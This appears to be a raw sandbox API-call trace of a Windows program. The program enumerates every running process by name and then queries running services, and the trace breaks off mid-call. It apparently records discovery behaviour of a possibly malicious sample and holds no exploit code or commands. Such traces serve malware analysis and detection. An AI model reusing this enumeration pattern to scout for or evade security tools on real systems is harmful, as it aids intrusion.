[0058.092] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0058.093] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0058.093] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.094] lstrlenW (lpString="svchost.exe") returned 11 [0058.094] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0058.094] lstrlenW (lpString="dwm.exe") returned 7 [0058.094] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.095] lstrlenW (lpString="svchost.exe") returned 11 [0058.095] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.096] lstrlenW (lpString="svchost.exe") returned 11 [0058.096] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.097] lstrlenW (lpString="svchost.exe") returned 11 [0058.097] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.097] lstrlenW (lpString="svchost.exe") returned 11 [0058.097] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.098] lstrlenW (lpString="svchost.exe") returned 11 [0058.098] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.099] lstrlenW (lpString="svchost.exe") returned 11 [0058.099] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.099] lstrlenW (lpString="svchost.exe") returned 11 [0058.099] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.100] lstrlenW (lpString="svchost.exe") returned 11 [0058.100] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.101] lstrlenW (lpString="svchost.exe") returned 11 [0058.101] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0058.102] lstrlenW (lpString="spoolsv.exe") returned 11 [0058.102] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.102] lstrlenW (lpString="svchost.exe") returned 11 [0058.102] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.103] lstrlenW (lpString="svchost.exe") returned 11 [0058.103] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0058.104] lstrlenW (lpString="audiodg.exe") returned 11 [0058.104] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0058.104] lstrlenW (lpString="sihost.exe") returned 10 [0058.104] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.105] lstrlenW (lpString="svchost.exe") returned 11 [0058.105] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0058.106] lstrlenW (lpString="taskhostw.exe") returned 13 [0058.106] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0058.107] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0058.107] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0058.107] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0058.108] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0058.108] lstrlenW (lpString="explorer.exe") returned 12 [0058.108] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0058.109] lstrlenW (lpString="Memory Compression") returned 18 [0058.109] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0058.110] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0058.110] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0058.110] lstrlenW (lpString="SearchUI.exe") returned 12 [0058.110] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0058.111] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0058.111] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0058.112] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0058.112] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0058.112] lstrlenW (lpString="taskhostw.exe") returned 13 [0058.112] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0058.113] lstrlenW (lpString="UsoClient.exe") returned 13 [0058.113] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0058.114] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0058.114] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0058.114] lstrlenW (lpString="taskhostw.exe") returned 13 [0058.114] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0058.115] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0058.115] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0058.116] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0058.116] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0058.116] lstrlenW (lpString="msoia.exe") returned 9 [0058.117] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0058.117] lstrlenW (lpString="msoia.exe") returned 9 [0058.117] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0058.118] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0058.118] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0058.119] lstrlenW (lpString="screensaver.exe") returned 15 [0058.119] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0058.119] lstrlenW (lpString="xml upper.exe") returned 13 [0058.119] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0058.120] lstrlenW (lpString="defeat preston.exe") returned 18 [0058.120] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0058.121] lstrlenW (lpString="boss isolated.exe") returned 17 [0058.121] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0058.121] lstrlenW (lpString="member.exe") returned 10 [0058.121] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0058.122] lstrlenW (lpString="chubby-er.exe") returned 13 [0058.122] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0058.123] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0058.123] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0058.123] lstrlenW (lpString="organization.exe") returned 16 [0058.123] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0058.124] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0058.124] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0058.125] lstrlenW (lpString="spray-roman.exe") returned 15 [0058.125] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0058.126] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0058.126] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0058.127] lstrlenW (lpString="tank attacks.exe") returned 16 [0058.127] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0058.573] lstrlenW (lpString="wires jacket.exe") returned 16 [0058.573] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0058.574] lstrlenW (lpString="values.exe") returned 10 [0058.574] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0058.575] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0058.575] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0058.576] lstrlenW (lpString="printersaerospace.exe") returned 21 [0058.576] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0058.577] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0058.577] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0058.578] lstrlenW (lpString="dllhost.exe") returned 11 [0058.578] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0058.578] lstrlenW (lpString="joke.exe") returned 8 [0058.578] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0058.579] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0058.579] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0058.580] lstrlenW (lpString="documents.exe") returned 13 [0058.580] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0058.581] lstrlenW (lpString="rebel.exe") returned 9 [0058.581] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0058.582] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0058.582] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0058.583] lstrlenW (lpString="conhost.exe") returned 11 [0058.583] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0058.584] lstrlenW (lpString="conhost.exe") returned 11 [0058.584] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0058.585] lstrlenW (lpString="hgaibc.exe") returned 10 [0058.585] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0058.585] lstrlenW (lpString="cmd.exe") returned 7 [0058.585] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0058.586] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0058.586] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0058.587] lstrlenW (lpString="conhost.exe") returned 11 [0058.587] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0058.588] lstrlenW (lpString="conhost.exe") returned 11 [0058.588] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.590] lstrlenW (lpString="svchost.exe") returned 11 [0058.590] Process32NextW (in: hSnapshot=0x368, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0058.591] CloseHandle (hObject=0x368) returned 1 [0058.591] Sleep (dwMilliseconds=0x1f4) [0059.979] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ede0 [0059.979] EnumServicesStatusExW (in: hSCManager=0x60ede0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0059.980] GetLastError () returned 0xea [0059.980] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1d5a) returned 0x6c0978 [0059.980] EnumServicesStatusExW (in: hSCManager=0x60ede0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6c0978, cbBufSize=0x1d5a, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6c0978, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0059.981] CloseServiceHandle (hSCObject=0x60ede0) returned 1 [0059.981] lstrlenW 